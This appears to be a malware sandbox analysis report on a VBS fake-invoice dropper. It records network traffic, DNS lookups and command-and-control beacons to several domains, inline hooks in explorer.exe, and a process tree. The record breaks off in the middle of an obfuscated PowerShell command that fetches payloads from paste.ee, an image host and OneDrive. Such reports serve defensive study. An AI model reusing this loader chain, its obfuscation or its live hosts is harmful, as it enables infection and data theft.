                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033382893 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033395052 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033488989 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033534050 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033596992 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033610106 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033679008 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033725023 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033796072 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033808947 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033883095 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033930063 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033986092 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.034006119 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.034085035 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.034128904 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.034188032 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.034271002 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.039026022 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.039052963 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.039113998 CEST4974280192.168.2.4217.160.0.95
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.039164066 CEST4974280192.168.2.4217.160.0.95
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Apr 18, 2024 21:11:14.142556906 CEST | 192.168.2.4 | 1.1.1.1 | 0xdecb | Standard query (0) | paste.ee | A (IP address) | IN (0x0001) | false |
| Apr 18, 2024 21:11:17.786118031 CEST | 192.168.2.4 | 1.1.1.1 | 0x17a2 | Standard query (0) | uploaddeimagens.com.br | A (IP address) | IN (0x0001) | false |
| Apr 18, 2024 21:11:25.120626926 CEST | 192.168.2.4 | 1.1.1.1 | 0xfd5c | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) | false |
| Apr 18, 2024 21:11:26.193128109 CEST | 192.168.2.4 | 1.1.1.1 | 0xcb28 | Standard query (0) | htdgia.db.files.1drv.com | A (IP address) | IN (0x0001) | false |
| Apr 18, 2024 21:12:11.353060007 CEST | 192.168.2.4 | 1.1.1.1 | 0xbd26 | Standard query (0) | www.msaway.com | A (IP address) | IN (0x0001) | false |
| Apr 18, 2024 21:12:32.602691889 CEST | 192.168.2.4 | 1.1.1.1 | 0xc406 | Standard query (0) | www.shakishaskakes.com | A (IP address) | IN (0x0001) | false |
| Apr 18, 2024 21:12:51.994155884 CEST | 192.168.2.4 | 1.1.1.1 | 0x2435 | Standard query (0) | www.xasvcd.xyz | A (IP address) | IN (0x0001) | false |
| Apr 18, 2024 21:13:13.058274031 CEST | 192.168.2.4 | 1.1.1.1 | 0xd996 | Standard query (0) | www.lunazone.us | A (IP address) | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Apr 18, 2024 21:11:14.250435114 CEST | 1.1.1.1 | 192.168.2.4 | 0xdecb | No error (0) | paste.ee | | 172.67.187.200 | A (IP address) | IN (0x0001) | false |
| Apr 18, 2024 21:11:14.250435114 CEST | 1.1.1.1 | 192.168.2.4 | 0xdecb | No error (0) | paste.ee | | 104.21.84.67 | A (IP address) | IN (0x0001) | false |
| Apr 18, 2024 21:11:17.894762039 CEST | 1.1.1.1 | 192.168.2.4 | 0x17a2 | No error (0) | uploaddeimagens.com.br | | 104.21.45.138 | A (IP address) | IN (0x0001) | false |
| Apr 18, 2024 21:11:17.894762039 CEST | 1.1.1.1 | 192.168.2.4 | 0x17a2 | No error (0) | uploaddeimagens.com.br | | 172.67.215.45 | A (IP address) | IN (0x0001) | false |
| Apr 18, 2024 21:11:25.226953030 CEST | 1.1.1.1 | 192.168.2.4 | 0xfd5c | No error (0) | onedrive.live.com | web.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Apr 18, 2024 21:11:25.226953030 CEST | 1.1.1.1 | 192.168.2.4 | 0xfd5c | No error (0) | web.fe.1drv.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Apr 18, 2024 21:11:25.226953030 CEST | 1.1.1.1 | 192.168.2.4 | 0xfd5c | No error (0) | odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net | dual-spov-0006.spov-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Apr 18, 2024 21:11:25.226953030 CEST | 1.1.1.1 | 192.168.2.4 | 0xfd5c | No error (0) | dual-spov-0006.spov-msedge.net | | 13.107.139.11 | A (IP address) | IN (0x0001) | false |
| Apr 18, 2024 21:11:25.226953030 CEST | 1.1.1.1 | 192.168.2.4 | 0xfd5c | No error (0) | dual-spov-0006.spov-msedge.net | | 13.107.137.11 | A (IP address) | IN (0x0001) | false |
| Apr 18, 2024 21:11:26.450829029 CEST | 1.1.1.1 | 192.168.2.4 | 0xcb28 | No error (0) | htdgia.db.files.1drv.com | db-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Apr 18, 2024 21:11:26.450829029 CEST | 1.1.1.1 | 192.168.2.4 | 0xcb28 | No error (0) | db-files.fe.1drv.com | odc-db-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Apr 18, 2024 21:11:32.599553108 CEST | 1.1.1.1 | 192.168.2.4 | 0x7734 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false |
| Apr 18, 2024 21:11:32.599553108 CEST | 1.1.1.1 | 192.168.2.4 | 0x7734 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false |
| Apr 18, 2024 21:11:33.536391973 CEST | 1.1.1.1 | 192.168.2.4 | 0x6c7c | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Apr 18, 2024 21:11:33.536391973 CEST | 1.1.1.1 | 192.168.2.4 | 0x6c7c | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.211.108 | A (IP address) | IN (0x0001) | false |
| Apr 18, 2024 21:11:45.777978897 CEST | 1.1.1.1 | 192.168.2.4 | 0x196a | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false |
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:45.777978897 CEST1.1.1.1192.168.2.40x196aNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:11.522789001 CEST1.1.1.1192.168.2.40xbd26No error (0)www.msaway.com217.160.0.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:32.713190079 CEST1.1.1.1192.168.2.40xc406Name error (3)www.shakishaskakes.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.157130957 CEST1.1.1.1192.168.2.40x2435No error (0)www.xasvcd.xyz203.161.57.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:13:13.272274971 CEST1.1.1.1192.168.2.40xd996No error (0)www.lunazone.uslunazone.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:13:13.272274971 CEST1.1.1.1192.168.2.40xd996No error (0)lunazone.us3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:13:13.272274971 CEST1.1.1.1192.168.2.40xd996No error (0)lunazone.us15.197.148.33A (IP address)IN (0x0001)false
• paste.ee
• uploaddeimagens.com.br
• onedrive.live.com
• www.msaway.com
• www.xasvcd.xyz
• www.lunazone.us
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49740 | 217.160.0.95 | 80 | 2580 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Apr 18, 2024 21:12:11.732719898 CEST | 155 | OUT | GET /m07a/?r0=FhT5TC53u3Z5TMdVNb/kS0zfz8OkKD2EUSj1eX+RC4J/yfdC5W2U1xrbN9PF9xQNo6z4&CN6=8pHxU0H HTTP/1.1
Host: www.msaway.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 18, 2024 21:12:11.946221113 CEST | 740 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 596
Connection: close
Date: Thu, 18 Apr 2024 19:12:11 GMT
Server: Apache
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404! </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> ERROR 404: ARCHIVO NO ENCONTRADO </h1> <p style="font-size:0.8em;"> El documento solicitado no ha sido encontrado. </p> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49742 | 217.160.0.95 | 80 | 2580 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Apr 18, 2024 21:12:14.189413071 CEST | 12890 | OUT | POST /m07a/ HTTP/1.1
Host: www.msaway.com
Connection: close
Content-Length: 175500
Cache-Control: no-cache
Origin: http://www.msaway.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.msaway.com/m07a/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Apr 18, 2024 21:12:14.400096893 CEST | 25780 | OUT
Apr 18, 2024 21:12:14.610882998 CEST | 10312 | OUT
Apr 18, 2024 21:12:14.611068964 CEST | 41248 | OUT
Apr 18, 2024 21:12:14.821667910 CEST | 36092 | OUT
Apr 18, 2024 21:12:14.821861982 CEST | 30936 | OUT
Apr 18, 2024 21:12:14.821943998 CEST | 5156 | OUT
Apr 18, 2024 21:12:14.821986914 CEST | 10312 | OUT
Apr 18, 2024 21:12:14.822021961 CEST | 3170 | OUT
                                                                                                                                                                                                                                                                Data Ascii: 7uu82OrmE7pBkHKa8MOSQC2koObvaHECnVMLyqoZNqD3irpy7QLTnlcVkU9O8qpusK~vXTrLLsmrTYLecMRZdaig3rlMgaAYpqCUECvz9IKmkhrTO0msJjgJSPMvxQ171QZARygqReFCrWDb08bOmLla7NQMgCSrJWfEK-koQmFIZTcIFn19PoVdO1xmakVDk2IGns7V~vjFEfin3hY6o2~gegt7fO6A8XApAPF6Omcbk0vpuHw
Timestamp | Bytes transferred | Direction | Data
Apr 18, 2024 21:12:15.039026022 CEST | 572 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Date: Thu, 18 Apr 2024 19:12:14 GMT
Server: Apache
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49743 | 203.161.57.217 | 80 | 2580 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Apr 18, 2024 21:12:52.314519882 CEST | 12890 | OUT | POST /m07a/ HTTP/1.1
Host: www.xasvcd.xyz
Connection: close
Content-Length: 175500
Cache-Control: no-cache
Origin: http://www.xasvcd.xyz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.xasvcd.xyz/m07a/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Timestamp | Bytes transferred | Direction | Data
Apr 18, 2024 21:12:53.232353926 CEST | 456 | IN | HTTP/1.1 404 Not Found
Date: Thu, 18 Apr 2024 19:12:52 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 276
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.xasvcd.xyz Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49744 | 3.33.130.190 | 80 | 2580 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Apr 18, 2024 21:13:13.377088070 CEST | 156 | OUT | GET /m07a/?r0=kbHmn/9MInRG3rqwWMOzjv0FEYEHMcqozMEbxoNxlifqHhdD1tGr+ls2dZBuYaiV3Vua&CN6=8pHxU0H HTTP/1.1
Host: www.lunazone.us
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 172.67.187.200 | 443 | 6940 | C:\Windows\System32\wscript.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-18 19:11:14 UTC | 319 | OUT | GET /d/K2No9 HTTP/1.1
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Accept-Language: en-ch
                                                                                                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                                                                Host: paste.ee
                                                                                                                                                                                                                                                                Connection: Keep-Alive
2024-04-18 19:11:15 UTC | 1234 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Thu, 18 Apr 2024 19:11:15 GMT
                                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Cache-Control: max-age=2592000
                                                                                                                                                                                                                                                                strict-transport-security: max-age=63072000
                                                                                                                                                                                                                                                                x-frame-options: DENY
                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K8PDtvxtJGUqY%2BcfvQvZ2dJOi6iYsyJxgZF6uzuTOhSY%2FDXMTbEXkNnLTW8eeCpeHK4ZKslYeSvxlPX1BTznDkTMt3vcZM561OTcYotXLV%2FiuJqjyg77eChcfA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8766f5a51912b033-ATL
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 104.21.45.138 | 443 | 3492 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-18 19:11:18 UTC | 124 | OUT | GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1
                                                                                                                                                                                                                                                                Host: uploaddeimagens.com.br
                                                                                                                                                                                                                                                                Connection: Keep-Alive
2024-04-18 19:11:18 UTC | 691 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Thu, 18 Apr 2024 19:11:18 GMT
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                Content-Length: 4201093
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Last-Modified: Wed, 17 Apr 2024 23:00:20 GMT
                                                                                                                                                                                                                                                                ETag: "66205484-401a85"
Cache-Control: max-age=2678400
CF-Cache-Status: HIT
Age: 1325
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sHEckdm4n7SbgtVyoQeomX8Nbwmv6G5OLXv27607gpSzDhZBUEToXWgJvimOOzRDj4GNjq2UchOjamLbQNmazB4grB2VXWdS6oP13hEbKjLXvY39tPbXWAtBEVzCbR2Id5G02hQrNUq%2F"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8766f5bb8d034570-ATL
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49732 | 104.21.45.138 | 443 | 3492 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-18 19:11:19 UTC | 100 | OUT | GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1
Host: uploaddeimagens.com.br
2024-04-18 19:11:20 UTC | 693 | IN | HTTP/1.1 200 OK
Date: Thu, 18 Apr 2024 19:11:20 GMT
Content-Type: image/jpeg
Content-Length: 4201093
Connection: close
Last-Modified: Wed, 17 Apr 2024 23:00:20 GMT
ETag: "66205484-401a85"
Cache-Control: max-age=2678400
CF-Cache-Status: HIT
Age: 1327
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4IvI6pquJI%2FGQjX2eiGdgyK5if5lWxOG23ejgZ7vDU4goklVflRhMMwg9jsszELkstTj2esjU8APJgE4RKIpbPw%2FObv6OCjAMuhkFHUHGfCotktGEOJs4gXZOB9fruNjjPFrntsFG9Xk"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8766f5c6f8fd4539-ATL
alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                Data Ascii: #K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hCS!v


Session ID:3
Source IP:192.168.2.4
Source Port:49733
Destination IP:13.107.139.11
Destination Port:443
PID:3492
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-18 19:11:25 UTC | 129 | OUT | GET /download?resid=4E6F63F4C3C86180%21112&authkey=!AJi85Fsyq6pgUBw HTTP/1.1
                                                                                                                                                                                                                                                                Host: onedrive.live.com
                                                                                                                                                                                                                                                                Connection: Keep-Alive
2024-04-18 19:11:26 UTC | 1168 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                                                                Location: https://htdgia.db.files.1drv.com/y4mdZqgHiAYYAMHkXnrzhlBVpfUqBhVsd5wAGw4Vw-FcIqEqjrZkuvsNkUrzqWLbPsiJlKGzXkmWCkwVHVM5OUp0dYYDxy5V6DltP3k0fGt1uqaRVEAsm0uwRw_gf01kPuWcNu-_HVrW44dE_jpuoOVN9Lb6UOuZ28z9zaSImdDybKfffF4JSjXi8kxh_2QVMcQcV914KaXkR1bnb3PSsKvEQ/ma.txt?download&psid=1
                                                                                                                                                                                                                                                                Set-Cookie: E=P:BobfV9tf3Ig=:Ra41qiyf2371S2VVii5RS1Gdb9CFALRt+lfuZIu7Pkg=:F; domain=.live.com; path=/
                                                                                                                                                                                                                                                                Set-Cookie: xid=3426038e-793f-4f90-8f52-9ce131069d27&&ODSP-ODWEB-ODCF&146; domain=.live.com; path=/
                                                                                                                                                                                                                                                                Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                                                                                                                                Set-Cookie: LD=; domain=.live.com; expires=Thu, 18-Apr-2024 17:31:25 GMT; path=/
                                                                                                                                                                                                                                                                Set-Cookie: wla42=; domain=live.com; expires=Thu, 25-Apr-2024 19:11:26 GMT; path=/
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                X-MSNServer: 5fd6fc6db4-rpcf2
                                                                                                                                                                                                                                                                X-ODWebServer: nameastus2946819-odwebpl
                                                                                                                                                                                                                                                                X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                                                                X-MSEdge-Ref: Ref A: 0447AA6B47B347698A5B60F1D4B5BBD3 Ref B: BN3EDGE0319 Ref C: 2024-04-18T19:11:25Z
                                                                                                                                                                                                                                                                Date: Thu, 18 Apr 2024 19:11:25 GMT
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                Code Manipulations

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x80 0x0E 0xEA
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x88 0x8E 0xEA
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x88 0x8E 0xEA
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x80 0x0E 0xEA


                                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                                Start time:21:11:12
                                                                                                                                                                                                                                                                Start date:18/04/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Signed Proforma Invoice 3645479_pdf.vbs"
                                                                                                                                                                                                                                                                Imagebase:0x7ff6e2c70000
                                                                                                                                                                                                                                                                File size:170'496 bytes
                                                                                                                                                                                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                                                                                Start time:21:11:14
                                                                                                                                                                                                                                                                Start date:18/04/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTr
